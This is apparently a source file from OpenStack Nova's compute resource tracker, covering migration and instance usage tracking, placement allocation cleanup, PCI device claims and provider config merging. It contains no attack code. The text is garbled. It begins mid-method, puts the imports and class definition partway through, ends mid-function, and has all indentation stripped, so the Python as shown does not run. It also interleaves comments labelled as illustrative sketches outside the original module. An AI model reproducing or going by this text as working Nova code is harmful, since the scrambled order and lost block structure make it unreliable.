LOG.debug('Starting to track incoming migration %s with flavor %s',
migration.uuid, itype.flavorid, instance=instance)
elif outbound and not tracked:
# instance migrated, but record usage for a possible revert:
itype = self._get_flavor(instance, 'old_', migration)
numa_topology = self._get_migration_context_resource(
'numa_topology', instance, prefix='old_')
# We could be racing with confirm_resize setting the
# instance.old_flavor field to None before the migration status
# is "confirmed" so if we did not find the flavor in the outgoing
# resized instance we won't track it.
if itype:
LOG.debug('Starting to track outgoing migration %s with '
'flavor %s', migration.uuid, itype.flavorid,
instance=instance)
if itype:
cn = self.compute_nodes[nodename]
usage = self._get_usage_dict(
itype, instance, numa_topology=numa_topology)
if self.pci_tracker and sign:
self.pci_tracker.update_pci_for_instance(
context, instance, sign=sign)
self._update_usage(usage, nodename)
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
obj = objects.PciDevicePoolList()
cn.pci_device_pools = obj
self.tracked_migrations[uuid] = migration
def _update_usage_from_migrations(self, context, migrations, nodename):
filtered = {}
instances = {}
self.tracked_migrations.clear()
# do some defensive filtering against bad migrations records in the
# database:
for migration in migrations:
uuid = migration.instance_uuid
try:
if uuid not in instances:
# Track migrating instance even if it is deleted but still
# has database record. This kind of instance might be
# deleted during unfinished migrating but exist in the
# hypervisor.
migration._context = context.elevated(read_deleted='yes')
instances[uuid] = migration.instance
except exception.InstanceNotFound as e:
# migration referencing deleted instance
LOG.debug('Migration instance not found: %s', e)
continue
            # Skip the migration if the instance is neither in a resize state
            # nor live-migrating.
if (not _instance_in_resize_state(instances[uuid]) and not
_instance_is_live_migrating(instances[uuid])):
LOG.debug('Skipping migration as instance is neither '
'resizing nor live-migrating.', instance_uuid=uuid)
continue
# filter to most recently updated migration for each instance:
other_migration = filtered.get(uuid, None)
# NOTE(claudiub): In Python 3, you cannot compare NoneTypes.
if other_migration:
om = other_migration
other_time = om.updated_at or om.created_at
migration_time = migration.updated_at or migration.created_at
if migration_time > other_time:
filtered[uuid] = migration
else:
filtered[uuid] = migration
for migration in filtered.values():
instance = instances[migration.instance_uuid]
# Skip migration (and mark it as error) if it doesn't match the
# instance migration id.
# This can happen if we have a stale migration record.
# We want to proceed if instance.migration_context is None
if (instance.migration_context is not None and
instance.migration_context.migration_id != migration.id):
LOG.info("Current instance migration %(im)s doesn't match "
"migration %(m)s, marking migration as error. "
"This can occur if a previous migration for this "
"instance did not complete.",
{'im': instance.migration_context.migration_id,
'm': migration.id})
migration.status = "error"
migration.save()
continue
try:
self._update_usage_from_migration(context, instance, migration,
nodename)
except exception.FlavorNotFound:
LOG.warning("Flavor could not be found, skipping migration.",
instance_uuid=instance.uuid)
continue
def _update_usage_from_instance(self, context, instance, nodename,
is_removed=False):
"""Update usage for a single instance."""
uuid = instance['uuid']
is_new_instance = uuid not in self.tracked_instances
# NOTE(sfinucan): Both brand new instances as well as instances that
# are being unshelved will have is_new_instance == True
is_removed_instance = not is_new_instance and (is_removed or
instance['vm_state'] in vm_states.ALLOW_RESOURCE_REMOVAL)
if is_new_instance:
self.tracked_instances.add(uuid)
sign = 1
if is_removed_instance:
self.tracked_instances.remove(uuid)
self._release_assigned_resources(instance.resources)
sign = -1
cn = self.compute_nodes[nodename]
stats = self.stats[nodename]
stats.update_stats_for_instance(instance, is_removed_instance)
cn.stats = stats
# if it's a new or deleted instance:
if is_new_instance or is_removed_instance:
if self.pci_tracker:
self.pci_tracker.update_pci_for_instance(context,
instance,
sign=sign)
# new instance, update compute node resource usage:
self._update_usage(self._get_usage_dict(instance, instance),
nodename, sign=sign)
# Stop tracking removed instances in the is_bfv cache. This needs to
# happen *after* calling _get_usage_dict() since that relies on the
# is_bfv cache.
if is_removed_instance and uuid in self.is_bfv:
del self.is_bfv[uuid]
cn.current_workload = stats.calculate_workload()
if self.pci_tracker:
obj = self.pci_tracker.stats.to_device_pools_obj()
cn.pci_device_pools = obj
else:
cn.pci_device_pools = objects.PciDevicePoolList()
def _update_usage_from_instances(self, context, instances, nodename):
"""Calculate resource usage based on instance utilization. This is
different than the hypervisor's view as it will account for all
instances assigned to the local compute host, even if they are not
currently powered on.
"""
self.tracked_instances.clear()
cn = self.compute_nodes[nodename]
# set some initial values, reserve room for host/hypervisor:
cn.local_gb_used = CONF.reserved_host_disk_mb / 1024
cn.memory_mb_used = CONF.reserved_host_memory_mb
cn.vcpus_used = CONF.reserved_host_cpus
cn.free_ram_mb = (cn.memory_mb - cn.memory_mb_used)
cn.free_disk_gb = (cn.local_gb - cn.local_gb_used)
cn.current_workload = 0
cn.running_vms = 0
instance_by_uuid = {}
for instance in instances:
if instance.vm_state not in vm_states.ALLOW_RESOURCE_REMOVAL:
self._update_usage_from_instance(context, instance, nodename)
instance_by_uuid[instance.uuid] = instance
return instance_by_uuid
def _remove_deleted_instances_allocations(self, context, cn,
migrations, instance_by_uuid):
migration_uuids = [migration.uuid for migration in migrations
if 'uuid' in migration]
# NOTE(jaypipes): All of this code sucks. It's basically dealing with
# all the corner cases in move, local delete, unshelve and rebuild
# operations for when allocations should be deleted when things didn't
# happen according to the normal flow of events where the scheduler
# always creates allocations for an instance
try:
# pai: report.ProviderAllocInfo namedtuple
pai = self.reportclient.get_allocations_for_resource_provider(
context, cn.uuid)
except (exception.ResourceProviderAllocationRetrievalFailed,
ks_exc.ClientException) as e:
LOG.error("Skipping removal of allocations for deleted instances: "
"%s", e)
return
allocations = pai.allocations
if not allocations:
# The main loop below would short-circuit anyway, but this saves us
# the (potentially expensive) context.elevated construction below.
return
read_deleted_context = context.elevated(read_deleted='yes')
for consumer_uuid, alloc in allocations.items():
if consumer_uuid in self.tracked_instances:
LOG.debug("Instance %s actively managed on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
if consumer_uuid in migration_uuids:
LOG.debug("Migration %s is active on this compute host "
"and has allocations in placement: %s.",
consumer_uuid, alloc)
continue
# We know these are instances now, so proceed
instance_uuid = consumer_uuid
instance = instance_by_uuid.get(instance_uuid)
if not instance:
try:
instance = objects.Instance.get_by_uuid(
read_deleted_context, consumer_uuid,
expected_attrs=[])
except exception.InstanceNotFound:
# The instance isn't even in the database. Either the
# scheduler _just_ created an allocation for it and we're
# racing with the creation in the cell database, or the
# instance was deleted and fully archived before we got a
# chance to run this. The former is far more likely than
# the latter. Avoid deleting allocations for a building
# instance here.
LOG.info("Instance %(uuid)s has allocations against this "
"compute host but is not found in the database.",
{'uuid': instance_uuid},
exc_info=False)
continue
# NOTE(mriedem): A cross-cell migration will work with instance
            # records across two cells; once the migration is confirmed/reverted,
            # one of them will be deleted but the instance still exists in the
# other cell. Before the instance is destroyed from the old cell
# though it is marked hidden=True so if we find a deleted hidden
# instance with allocations against this compute node we just
# ignore it since the migration operation will handle cleaning up
# those allocations.
if instance.deleted and not instance.hidden:
# The instance is gone, so we definitely want to remove
# allocations associated with it.
LOG.debug("Instance %s has been deleted (perhaps locally). "
"Deleting allocations that remained for this "
"instance against this compute host: %s.",
instance_uuid, alloc)
# We don't force delete the allocation in this case because if
# there is a conflict we'll retry on the next
# update_available_resource periodic run.
self.reportclient.delete_allocation_for_instance(context,
instance_uuid,
force=False)
continue
if not instance.host:
# Allocations related to instances being scheduled should not
# be deleted if we already wrote the allocation previously.
LOG.debug("Instance %s has been scheduled to this compute "
"host, the scheduler has made an allocation "
"against this compute node but the instance has "
"yet to start. Skipping heal of allocation: %s.",
instance_uuid, alloc)
continue
if (instance.host == cn.host and
instance.node == cn.hypervisor_hostname):
# The instance is supposed to be on this compute host but is
# not in the list of actively managed instances. This could be
# because we are racing with an instance_claim call during
# initial build or unshelve where the instance host/node is set
# before the instance is added to tracked_instances. If the
# task_state is set, then consider things in motion and log at
# debug level instead of warning.
if instance.task_state:
LOG.debug('Instance with task_state "%s" is not being '
'actively managed by this compute host but has '
'allocations referencing this compute node '
'(%s): %s. Skipping heal of allocations during '
'the task state transition.',
instance.task_state, cn.uuid, alloc,
instance=instance)
else:
LOG.warning("Instance %s is not being actively managed by "
"this compute host but has allocations "
"referencing this compute host: %s. Skipping "
"heal of allocation because we do not know "
"what to do.", instance_uuid, alloc)
continue
if instance.host != cn.host:
# The instance has been moved to another host either via a
# migration, evacuation or unshelve in between the time when we
# ran InstanceList.get_by_host_and_node(), added those
# instances to RT.tracked_instances and the above
# Instance.get_by_uuid() call. We SHOULD attempt to remove any
# allocations that reference this compute host if the VM is in
# a stable terminal state (i.e. it isn't in a state of waiting
# for resize to confirm/revert), however if the destination
# host is an Ocata compute host, it will delete the allocation
# that contains this source compute host information anyway and
# recreate an allocation that only refers to itself. So we
# don't need to do anything in that case. Just log the
# situation here for information but don't attempt to delete or
# change the allocation.
LOG.warning("Instance %s has been moved to another host "
"%s(%s). There are allocations remaining against "
"the source host that might need to be removed: "
"%s.",
instance_uuid, instance.host, instance.node, alloc)
def delete_allocation_for_evacuated_instance(self, context, instance, node,
node_type='source'):
# Clean up the instance allocation from this node in placement
cn_uuid = self.compute_nodes[node].uuid
if not self.reportclient.remove_provider_tree_from_instance_allocation(
context, instance.uuid, cn_uuid):
LOG.error("Failed to clean allocation of evacuated "
"instance on the %s node %s",
node_type, cn_uuid, instance=instance)
def delete_allocation_for_shelve_offloaded_instance(self, context,
instance):
self.reportclient.delete_allocation_for_instance(
context, instance.uuid, force=True)
def _verify_resources(self, resources):
resource_keys = ["vcpus", "memory_mb", "local_gb", "cpu_info",
"vcpus_used", "memory_mb_used", "local_gb_used",
"numa_topology"]
missing_keys = [k for k in resource_keys if k not in resources]
if missing_keys:
reason = _("Missing keys: %s") % missing_keys
raise exception.InvalidInput(reason=reason)
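    # Illustrative sketch (not part of the original module): a minimal
    # resources dict, as reported by a virt driver, that passes the
    # _verify_resources() check above; the values are made up:
    #
    #     resources = {
    #         'vcpus': 8, 'vcpus_used': 2,
    #         'memory_mb': 16384, 'memory_mb_used': 4096,
    #         'local_gb': 100, 'local_gb_used': 20,
    #         'cpu_info': '', 'numa_topology': None,
    #     }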
def _get_flavor(self, instance, prefix, migration):
"""Get the flavor from instance."""
if migration.is_resize:
return getattr(instance, '%sflavor' % prefix)
# NOTE(ndipanov): Certain migration types (all but resize)
# do not change flavors so there is no need to stash
# them. In that case - just get the instance flavor.
return instance.flavor
def _get_usage_dict(self, object_or_dict, instance, **updates):
"""Make a usage dict _update methods expect.
Accepts a dict or an Instance or Flavor object, and a set of updates.
Converts the object to a dict and applies the updates.
:param object_or_dict: instance or flavor as an object or just a dict
:param instance: nova.objects.Instance for the related operation; this
is needed to determine if the instance is
volume-backed
:param updates: key-value pairs to update the passed object.
Currently only considers 'numa_topology', all other
keys are ignored.
:returns: a dict with all the information from object_or_dict updated
with updates
"""
def _is_bfv():
# Check to see if we have the is_bfv value cached.
if instance.uuid in self.is_bfv:
is_bfv = self.is_bfv[instance.uuid]
else:
is_bfv = compute_utils.is_volume_backed_instance(
instance._context, instance)
self.is_bfv[instance.uuid] = is_bfv
return is_bfv
usage = {}
if isinstance(object_or_dict, objects.Instance):
is_bfv = _is_bfv()
usage = {'memory_mb': object_or_dict.flavor.memory_mb,
'swap': object_or_dict.flavor.swap,
'vcpus': object_or_dict.flavor.vcpus,
'root_gb': (0 if is_bfv else
object_or_dict.flavor.root_gb),
'ephemeral_gb': object_or_dict.flavor.ephemeral_gb,
'numa_topology': object_or_dict.numa_topology}
elif isinstance(object_or_dict, objects.Flavor):
usage = obj_base.obj_to_primitive(object_or_dict)
if _is_bfv():
usage['root_gb'] = 0
else:
usage.update(object_or_dict)
for key in ('numa_topology',):
if key in updates:
usage[key] = updates[key]
return usage
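    # Illustrative sketch (not part of the original module): the effect of
    # the boot-from-volume handling above; `rt` and `instance` are assumed:
    #
    #     usage = rt._get_usage_dict(instance, instance)
    #     # usage['root_gb'] == 0 for a volume-backed instance,
    #     # usage['root_gb'] == instance.flavor.root_gb otherwise.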
def _merge_provider_configs(self, provider_configs, provider_tree):
"""Takes a provider tree and merges any provider configs. Any
providers in the update that are not present in the tree are logged
and ignored. Providers identified by both $COMPUTE_NODE and explicit
UUID/NAME will only be updated with the additional inventories and
traits in the explicit provider config entry.
:param provider_configs: The provider configs to merge
:param provider_tree: The provider tree to be updated in place
"""
processed_providers = {}
provider_custom_traits = {}
for uuid_or_name, provider_data in provider_configs.items():
additional_traits = provider_data.get(
"traits", {}).get("additional", [])
additional_inventories = provider_data.get(
"inventories", {}).get("additional", [])
# This is just used to make log entries more useful
source_file_name = provider_data['__source_file']
# In most cases this will contain a single provider except in
# the case of UUID=$COMPUTE_NODE, it may contain multiple.
providers_to_update = self._get_providers_to_update(
uuid_or_name, provider_tree, source_file_name)
for provider in providers_to_update:
# $COMPUTE_NODE is used to define a "default" rule to apply
# to all your compute nodes, but then override it for
# specific ones.
#
# If this is for UUID=$COMPUTE_NODE, check if provider is also
# explicitly identified. If it is, skip updating it with the
# $COMPUTE_NODE entry data.
if uuid_or_name == "$COMPUTE_NODE":
if any(_pid in provider_configs
for _pid in [provider.name, provider.uuid]):
continue
# for each provider specified by name or uuid check that
# we have not already processed it to prevent duplicate
# declarations of the same provider.
current_uuid = provider.uuid
if current_uuid in processed_providers:
raise ValueError(_(
"Provider config '%(source_file_name)s' conflicts "
"with provider config '%(processed_providers)s'. "
"The same provider is specified using both name "
"'%(uuid_or_name)s' and uuid '%(current_uuid)s'.") % {
'source_file_name': source_file_name,
'processed_providers':
processed_providers[current_uuid],
'uuid_or_name': uuid_or_name,
'current_uuid': current_uuid
}
)
                # NOTE(sean-k-mooney): since each provider should be processed
                # at most once, if a provider has custom traits they were set
                # either in a previous iteration, by the virt driver, or via
                # the placement api. As a result we must ignore them when
# checking for duplicate traits so we construct a set of the
# existing custom traits.
if current_uuid not in provider_custom_traits:
provider_custom_traits[current_uuid] = {
trait for trait in provider.traits
if trait.startswith('CUSTOM')
}
existing_custom_traits = provider_custom_traits[current_uuid]
if additional_traits:
intersect = set(provider.traits) & set(additional_traits)
intersect -= existing_custom_traits
if intersect:
invalid = ','.join(intersect)
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define a trait that is owned by the "
"virt driver or specified via the placment api. "
"Invalid traits '%(invalid)s' must be removed "
"from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': invalid
}
)
provider_tree.add_traits(provider.uuid, *additional_traits)
if additional_inventories:
merged_inventory = provider.inventory
intersect = (merged_inventory.keys() &
{rc for inv_dict in additional_inventories
for rc in inv_dict})
if intersect:
raise ValueError(_(
"Provider config '%(source_file_name)s' attempts "
"to define an inventory that is owned by the "
"virt driver. Invalid inventories '%(invalid)s' "
"must be removed from '%(source_file_name)s'.") % {
'source_file_name': source_file_name,
'invalid': ','.join(intersect)
}
)
for inventory in additional_inventories:
merged_inventory.update(inventory)
provider_tree.update_inventory(
provider.uuid, merged_inventory)
processed_providers[current_uuid] = source_file_name
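    # Illustrative sketch (not part of the original module): the shape of
    # provider_configs merged above; the trait and resource class names are
    # made up. A "$COMPUTE_NODE" entry applies to every compute node root
    # provider unless that provider is also identified explicitly:
    #
    #     provider_configs = {
    #         '$COMPUTE_NODE': {
    #             '__source_file': 'compute.yaml',
    #             'traits': {'additional': ['CUSTOM_EXAMPLE_TRAIT']},
    #             'inventories': {
    #                 'additional': [{'CUSTOM_EXAMPLE_RC': {'total': 4}}],
    #             },
    #         },
    #     }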
def _get_providers_to_update(self, uuid_or_name, provider_tree,
source_file):
"""Identifies the providers to be updated.
Intended only to be consumed by _merge_provider_configs()
        :param uuid_or_name: Provider name or UUID from the provider config
:param provider_tree: Provider tree to get providers from
:param source_file: Provider config file containing the inventories
:returns: list of ProviderData
"""
# $COMPUTE_NODE is used to define a "default" rule to apply
# to all your compute nodes, but then override it for
# specific ones.
if uuid_or_name == "$COMPUTE_NODE":
return [root.data() for root in provider_tree.roots
if os_traits.COMPUTE_NODE in root.traits]
try:
providers_to_update = [provider_tree.data(uuid_or_name)]
# Remove the provider from absent provider list if present
# so we can re-warn if the provider disappears again later
self.absent_providers.discard(uuid_or_name)
except ValueError:
providers_to_update = []
if uuid_or_name not in self.absent_providers:
LOG.warning(
"Provider '%(uuid_or_name)s' specified in provider "
"config file '%(source_file)s' does not exist in the "
"ProviderTree and will be ignored.",
{"uuid_or_name": uuid_or_name,
"source_file": source_file})
self.absent_providers.add(uuid_or_name)
return providers_to_update
def build_failed(self, nodename):
"""Increments the failed_builds stats for the given node."""
self.stats[nodename].build_failed()
def build_succeeded(self, nodename):
"""Resets the failed_builds stats for the given node."""
self.stats[nodename].build_succeeded()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def claim_pci_devices(self, context, pci_requests, instance_numa_topology):
"""Claim instance PCI resources
:param context: security context
:param pci_requests: a list of nova.objects.InstancePCIRequests
:param instance_numa_topology: an InstanceNumaTopology object used to
ensure PCI devices are aligned with the NUMA topology of the
instance
:returns: a list of nova.objects.PciDevice objects
"""
result = self.pci_tracker.claim_instance(
context, pci_requests, instance_numa_topology)
self.pci_tracker.save(context)
return result
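    # Illustrative sketch (not part of the original module): a caller-side
    # claim/allocate sequence; `ctxt`, `reqs`, `numa` and `instance` are
    # assumed to come from the build flow:
    #
    #     devs = rt.claim_pci_devices(ctxt, reqs, numa)
    #     rt.allocate_pci_devices_for_instance(ctxt, instance)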
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def unclaim_pci_devices(self, context, pci_device, instance):
"""Deallocate PCI devices
:param context: security context
:param pci_device: the objects.PciDevice describing the PCI device to
be freed
:param instance: the objects.Instance the PCI resources are freed from
"""
self.pci_tracker.free_device(pci_device, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def allocate_pci_devices_for_instance(self, context, instance):
"""Allocate instance claimed PCI resources
:param context: security context
:param instance: instance object
"""
self.pci_tracker.allocate_instance(instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_allocations_for_instance(self, context, instance):
"""Free instance allocated PCI resources
:param context: security context
:param instance: instance object
"""
self.pci_tracker.free_instance_allocations(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def free_pci_device_claims_for_instance(self, context, instance):
"""Free instance claimed PCI resources
:param context: security context
:param instance: instance object
"""
self.pci_tracker.free_instance_claims(context, instance)
self.pci_tracker.save(context)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def finish_evacuation(self, instance, node, migration):
instance.apply_migration_context()
# NOTE (ndipanov): This save will now update the host and node
# attributes making sure that next RT pass is consistent since
# it will be based on the instance and not the migration DB
# entry.
instance.host = self.host
instance.node = node
instance.save()
instance.drop_migration_context()
# NOTE (ndipanov): Mark the migration as done only after we
# mark the instance as belonging to this host.
if migration:
migration.status = 'done'
migration.save()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def clean_compute_node_cache(self, compute_nodes_in_db):
"""Clean the compute node cache of any nodes that no longer exist.
:param compute_nodes_in_db: list of ComputeNode objects from the DB.
"""
compute_nodes_in_db_nodenames = {cn.hypervisor_hostname
for cn in compute_nodes_in_db}
stale_cns = set(self.compute_nodes) - compute_nodes_in_db_nodenames
for stale_cn in stale_cns:
# NOTE(mgoddard): we have found a node in the cache that has no
# compute node in the DB. This could be due to a node rebalance
# where another compute service took ownership of the node. Clean
# up the cache.
self.remove_node(stale_cn)
self.reportclient.invalidate_resource_provider(stale_cn)
import collections
import copy
from keystoneauth1 import exceptions as ks_exc
import os_traits
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import excutils
import retrying
from nova.compute import claims
from nova.compute import monitors
from nova.compute import provider_config
from nova.compute import stats as compute_stats
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
import nova.conf
from nova import exception
from nova.i18n import _
from nova import objects
from nova.objects import base as obj_base
from nova.objects import fields
from nova.objects import migration as migration_obj
from nova.pci import manager as pci_manager
from nova.pci import request as pci_request
from nova import rpc
from nova.scheduler.client import report
from nova import utils
from nova.virt import hardware
CONF = nova.conf.CONF
LOG = logging.getLogger(__name__)
COMPUTE_RESOURCE_SEMAPHORE = "compute_resources"
def _instance_in_resize_state(instance):
vm = instance.vm_state
task = instance.task_state
if vm == vm_states.RESIZED:
return True
if vm in [vm_states.ACTIVE, vm_states.STOPPED] and task in (
task_states.resizing_states + task_states.rebuild_states):
return True
return False
def _instance_is_live_migrating(instance):
vm = instance.vm_state
task = instance.task_state
if task == task_states.MIGRATING and vm in [vm_states.ACTIVE,
vm_states.PAUSED]:
return True
return False
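# Illustrative sketch (not part of the original module): how the two
# predicates above classify an actively live-migrating instance:
#
#     instance.vm_state = vm_states.ACTIVE
#     instance.task_state = task_states.MIGRATING
#     _instance_in_resize_state(instance)    # False
#     _instance_is_live_migrating(instance)  # True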
class ResourceTracker(object):
def __init__(self, host, driver, reportclient=None):
self.host = host
self.driver = driver
self.pci_tracker = None
self.compute_nodes = {}
self.stats = collections.defaultdict(compute_stats.Stats)
self.tracked_instances = set()
self.tracked_migrations = {}
        self.is_bfv = {}
        monitor_handler = monitors.MonitorHandler(self)
self.monitors = monitor_handler.monitors
self.old_resources = collections.defaultdict(objects.ComputeNode)
self.reportclient = reportclient or report.SchedulerReportClient()
self.ram_allocation_ratio = CONF.ram_allocation_ratio
self.cpu_allocation_ratio = CONF.cpu_allocation_ratio
self.disk_allocation_ratio = CONF.disk_allocation_ratio
self.provider_tree = None
self.assigned_resources = collections.defaultdict(
lambda: collections.defaultdict(set))
self.provider_configs = provider_config.get_provider_configs(
CONF.compute.provider_config_location)
self.absent_providers = set()
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def instance_claim(self, context, instance, nodename, allocations,
limits=None):
if self.disabled(nodename):
self._set_instance_host_and_node(instance, nodename)
return claims.NopClaim()
if instance.host:
LOG.warning("Host field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
if instance.node:
LOG.warning("Node field should not be set on the instance "
"until resources have been claimed.",
instance=instance)
cn = self.compute_nodes[nodename]
pci_requests = instance.pci_requests
claim = claims.Claim(context, instance, nodename, self, cn,
pci_requests, limits=limits)
instance_numa_topology = claim.claimed_numa_topology
instance.numa_topology = instance_numa_topology
self._set_instance_host_and_node(instance, nodename)
if self.pci_tracker:
# NOTE(jaypipes): ComputeNode.pci_device_pools is set below
# in _update_usage_from_instance().
self.pci_tracker.claim_instance(context, pci_requests,
instance_numa_topology)
claimed_resources = self._claim_resources(allocations)
instance.resources = claimed_resources
# Mark resources in-use and update stats
self._update_usage_from_instance(context, instance, nodename)
elevated = context.elevated()
# persist changes to the compute node:
self._update(elevated, cn)
return claim
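    # Illustrative sketch (not part of the original module): callers
    # typically use the returned claim as a context manager so the claimed
    # resources are rolled back if spawning fails; the names are assumed:
    #
    #     with rt.instance_claim(ctxt, instance, nodename, allocs, limits):
    #         driver.spawn(ctxt, instance, ...)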
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def rebuild_claim(self, context, instance, nodename, allocations,
limits=None, image_meta=None, migration=None):
return self._move_claim(
context, instance, instance.flavor, nodename, migration,
allocations, move_type=fields.MigrationType.EVACUATION,
image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def resize_claim(
self, context, instance, flavor, nodename, migration, allocations,
image_meta=None, limits=None,
):
return self._move_claim(
context, instance, flavor, nodename, migration,
allocations, image_meta=image_meta, limits=limits)
@utils.synchronized(COMPUTE_RESOURCE_SEMAPHORE, fair=True)
def live_migration_claim(
self, context, instance, nodename, migration, limits, allocs,
):
# Flavor and image cannot change during a live migration.
flavor = instance.flavor
image_meta = instance.image_meta
return self._move_claim(
context, instance, flavor, nodename, migration, allocs,
move_type=fields.MigrationType.LIVE_MIGRATION,
image_meta=image_meta, limits=limits,
)
def _move_claim(
self, context, instance, new_flavor, nodename, migration, allocations,
move_type=None, image_meta=None, limits=None,
):
image_meta = image_meta or {}
if migration:
self._claim_existing_migration(migration, nodename)
else:
migration = self._create_migration(
context, instance, new_flavor, nodename, move_type)
if self.disabled(nodename):
            # compute_driver doesn't support resource tracking, just
            # generate the migration record and continue the resize:
return claims.NopClaim(migration=migration)
cn = self.compute_nodes[nodename]
new_pci_requests = pci_request.get_pci_requests_from_flavor(
new_flavor)
new_pci_requests.instance_uuid = instance.uuid
if instance.pci_requests:
for request in instance.pci_requests.requests:
if request.source == objects.InstancePCIRequest.NEUTRON_PORT:
new_pci_requests.requests.append(request)
claim = claims.MoveClaim(context, instance, nodename,
new_flavor, image_meta, self, cn,
new_pci_requests, migration, limits=limits)
claimed_pci_devices_objs = []
        # Live migration handles its own PCI claims in its dedicated code
        # path, so skip claiming here to avoid stepping on that code's toes.
if self.pci_tracker and not migration.is_live_migration:
claimed_pci_devices_objs = self.pci_tracker.claim_instance(
context, new_pci_requests, claim.claimed_numa_topology)
claimed_pci_devices = objects.PciDeviceList(
objects=claimed_pci_devices_objs)
claimed_resources = self._claim_resources(allocations)
old_resources = instance.resources
        # TODO(jaypipes): Move claimed_numa_topology out of the Claim's
        # constructor flow so the Claim constructor only tests whether
        # resources can be claimed, not consume the resources directly.
mig_context = objects.MigrationContext(
context=context, instance_uuid=instance.uuid,
migration_id=migration.id,
old_numa_topology=instance.numa_topology,
new_numa_topology=claim.claimed_numa_topology,
old_pci_devices=instance.pci_devices,
new_pci_devices=claimed_pci_devices,
old_pci_requests=instance.pci_requests,
new_pci_requests=new_pci_requests,
old_resources=old_resources,
new_resources=claimed_resources)
instance.migration_context = mig_context
instance.save()
# Mark the resources in-use for the resize landing on this
# compute host:
self._update_usage_from_migration(context, instance, migration,
nodename)
elevated = context.elevated()
self._update(elevated, cn)
return claim
def _create_migration(
self, context, instance, new_flavor, nodename, move_type=None,
):
migration = objects.Migration(context=context.elevated())
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
migration.old_instance_type_id = instance.flavor.id
migration.new_instance_type_id = new_flavor.id
migration.status = 'pre-migrating'
migration.instance_uuid = instance.uuid
migration.source_compute = instance.host
migration.source_node = instance.node
if move_type:
migration.migration_type = move_type
else:
migration.migration_type = migration_obj.determine_migration_type(
migration)
migration.create()
return migration
def _claim_existing_migration(self, migration, nodename):
migration.dest_compute = self.host
migration.dest_node = nodename
migration.dest_host = self.driver.get_host_ip_addr()
# NOTE(artom) Migration objects for live migrations are created with
# status 'accepted' by the conductor in live_migrate_instance() and do
# not have a 'pre-migrating' status.
if not migration.is_live_migration:
migration.status = 'pre-migrating'
migration.save()
def _claim_resources(self, allocations):
if not allocations:
return None
claimed_resources = []
for rp_uuid, alloc_dict in allocations.items():
try:
provider_data = self.provider_tree.data(rp_uuid)
except ValueError:
                # If an instance is in evacuating, it will hold new and old
                # allocations, but the provider UUIDs in old allocations won't
                # be in the provider tree, so skip claiming those resources.
LOG.debug("Skip claiming resources of provider %(rp_uuid)s, "
"since the provider UUIDs are not in provider tree.",
{'rp_uuid': rp_uuid})
continue
for rc, amount in alloc_dict['resources'].items():
if rc not in provider_data.resources:
                    # We don't use provider custom resources to assign this
                    # kind of resource class, such as 'VCPU', for now;
                    # otherwise provider_data.resources would be populated
                    # with this resource class when updating the provider
                    # tree.
continue
assigned = self.assigned_resources[rp_uuid][rc]
free = provider_data.resources[rc] - assigned
if amount > len(free):
reason = (_("Needed %(amount)d units of resource class "
"%(rc)s, but %(avail)d are available.") %
{'amount': amount,
'rc': rc,
'avail': len(free)})
raise exception.ComputeResourcesUnavailable(reason=reason)
for i in range(amount):
claimed_resources.append(free.pop())
if claimed_resources:
self._add_assigned_resources(claimed_resources)
return objects.ResourceList(objects=claimed_resources)
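    # Illustrative sketch (not part of the original module): the shape of
    # the `allocations` argument above, keyed by resource provider UUID;
    # the UUID and resource class names are made up. Only resource classes
    # present in provider_data.resources are turned into assigned Resource
    # objects; the rest are skipped:
    #
    #     allocations = {
    #         '6a9f...': {'resources': {'CUSTOM_EXAMPLE_RC': 2, 'VCPU': 4}},
    #     }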
def _populate_assigned_resources(self, context, instance_by_uuid):
resources = []
# Get resources assigned to migrations
for mig in self.tracked_migrations.values():
mig_ctx = mig.instance.migration_context
# We might have a migration whose instance hasn't arrived here yet.
if not mig_ctx:
continue
if mig.source_compute == self.host and 'old_resources' in mig_ctx:
resources.extend(mig_ctx.old_resources or [])
if mig.dest_compute == self.host and 'new_resources' in mig_ctx:
resources.extend(mig_ctx.new_resources or [])
for uuid in self.tracked_instances:
resources.extend(instance_by_uuid[uuid].resources or [])
self.assigned_resources.clear()
self._add_assigned_resources(resources)
def _check_resources(self, context):
notfound = set()
for rp_uuid in self.assigned_resources:
provider_data = self.provider_tree.data(rp_uuid)
for rc, assigned in self.assigned_resources[rp_uuid].items():
notfound |= (assigned - provider_data.resources[rc])
if not notfound:
return
        # This can happen when assigned resources are removed from the
        # provider configuration and the compute service is reloaded
        # or restarted.
resources = [(res.identifier, res.resource_class) for res in notfound]
reason = _("The following resources are assigned to instances, "
"but were not listed in the configuration: %s "
"Please check if this will influence your instances, "
"and restore your configuration if necessary") % resources
raise exception.AssignedResourceNotFound(reason=reason)
def _release_assigned_resources(self, resources):
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
rc = resource.resource_class
try:
self.assigned_resources[rp_uuid][rc].remove(resource)
except KeyError:
LOG.warning("Release resource %(rc)s: %(id)s of provider "
"%(rp_uuid)s, not tracked in "
"ResourceTracker.assigned_resources.",
{'rc': rc, 'id': resource.identifier,
'rp_uuid': rp_uuid})
def _add_assigned_resources(self, resources):
if not resources:
return
for resource in resources:
rp_uuid = resource.provider_uuid
